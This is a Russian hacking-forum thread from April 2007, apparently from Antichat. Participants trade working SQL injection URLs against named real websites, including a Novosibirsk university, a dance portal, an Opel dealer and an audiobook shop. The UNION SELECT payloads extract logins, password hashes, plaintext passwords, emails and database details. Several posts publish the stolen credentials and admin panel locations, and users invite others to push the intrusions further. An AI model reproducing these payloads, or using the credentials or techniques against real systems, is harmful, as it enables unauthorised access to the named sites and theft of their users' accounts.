 |
|
13.04.2007, 23:47
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
sql-inj
Новосибирский Гос Тех Университет
Сайт: http://inform.nstu.ru/
уязвимость: http://inform.nstu.ru/index.php?type=ubilei&stat=1'
подобранные таблицы: users
подобранные поля: login,password
7 организмов
http://inform.nstu.ru/index.php?type=ubilei&stat=-1%20union%20select%201,2,concat(login,char(58),pas sword),4,5,6,7,8,9,0,1,2,3%20from%20users%20limit% 200,1/*
нулевой организм: ZiF:0b2fdf29656163be070897c655defc12 rockme |
|
|
14.04.2007, 00:19
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
sql-not_finished
Незавершенное:
Сайт: http://www.step-into-the-future.ru/ (олимпиада "Шаг в будущее")
Информация: (stepin@aqua2.di-net.ru:4.0.26)
http://www.step-into-the-future.ru/frb_light/view_all_topic.php?&mid=-1&t=&text_po isk=&m_id=-534+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion()),6,7,8/*
Сайт: http://www.idance.ru/ (Портал современных танцев iDance)
Информация: (idancer_idancedb@localhost:4.1.22)
http://www.idance.ru/show.php?id_s=-15+union+select+concat_ws(0x3a,user(),version()),2/*
Сайт: http://www.kif-daks.ru/ (Оптовая торговля книгами. КИФ-Дакс)
Информация: (mataru@localhost:4.1.20-lk-log)
http://www.kif-daks.ru/newprew.php?id=-336+union+select+1,concat_ws(0x3a,user(),version() ),3,4,5,6,7,8/*
Кто продвинется, пишем.
Последний раз редактировалось Koller; 14.04.2007 в 04:41..
|
|
|
|
14.04.2007, 04:31
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами:
10374086
Репутация:
1745
|
|
Код:
http://opel.avto-city.ru/catalog.php?id=-3+union+select+login,2,pass,4,5,6,7+from+admin/*
opel:reklama
Автоцентр Сити - официальный дилер Opel (Опель) |
|
|
|
14.04.2007, 08:20
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами:
10686686
Репутация:
447
|
|
Код:
http://www.seredina.ru/index.php?id=1&city_id=-12+union+select+concat(login,char(58),pwd)+from+admins/*
хороша  дружно ищем админку |
|
|
|
14.04.2007, 08:55
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами:
10088966
Репутация:
646
|
|
http://comedy.perm.ru/main/index.html?pg=7&nid=-1+union+select+1,2,3,version(),5,6,7/*
Мышка, ****, норушка (с) Галыгин.
P.S. Ничего интересного по части таблиц так и не нашел...
|
|
|
|
14.04.2007, 09:51
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
sql-inj
Сайт: http://www.audiobookz.ru/
уязвимость: http://www.audiobookz.ru/show_r.php?r=1'
подобранные таблицы: users
подобранные поля: login,pas,uid,name
http://www.audiobookz.ru/show_r.php?r=1+union+select+concat_ws(0x3a,uid,nam e,login,pas)+from+users/*
есть админка http://www.audiobookz.ru/admin/ , но не пашет.
|
|
|
|
14.04.2007, 10:09
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами:
10248806
Репутация:
2371
|
|
www.equipnet.ru
Код:
http://www.equipnet.ru/show_firm.php?firm_id=-23638+union+select+concat(convert(version()+using+cp1251),char(59),database(),char(59),user())/*
Последний раз редактировалось Isis; 14.04.2007 в 10:31..
|
|
|
|
14.04.2007, 10:19
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
cont
comedy
Сообщение от Joker-jar
Мышка, ****, норушка (с) Галыгин.
P.S. Ничего интересного по части таблиц так и не нашел...
Нашел таблицы news, ibf_members, ibf_admin_sessions и т.д. но походу ibf_* не от того форума, который действует на сайте.
http://comedy.perm.ru/main/index.html?pg=7&nid=-1+union+select+1,2,3,concat_ws(0x3a,id,name,passwo rd,email,ip_address),5,6,7+from+ibf_members+limit+ 1,1/*
Последний раз редактировалось Серенький; 14.04.2007 в 10:21..
|
|
|
|
14.04.2007, 10:32
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами:
10248806
Репутация:
2371
|
|
www.photodom.com
Код:
http://www.photodom.com/mypage.php?nick=Font'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,user(),database(),22,23,24,25,26,27,28,29/*
www.coffeeblues.ru
Код:
http://www.coffeeblues.ru/news/index.php3?id=-31+union+select+1,2,concat(database(),char(58,58),user(),char(58,58),version()),4,5,6,7,8,9,10,11,12/*
www.super.com.ua
Код:
http://www.super.com.ua/local/plug-in/a-price/showone.php?groupid=65&id=-21096+union+select+1,2,3,4,5,6,7,8,9,concat(database(),char(58,58),user(),char(58,58),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
Последний раз редактировалось Isis; 14.04.2007 в 10:56..
|
|
|
|
14.04.2007, 13:00
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами:
10160966
Репутация:
1719
|
|
apelsinclub.ru
Код:
http://www.apelsinclub.ru/show.php?event=-1+union+select+1,2,3,concat(nick,0x3a,pwd),5,6,7+from+users/*
pwd=email в форме логина.
пароли в чистом виде
admin:uuu
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
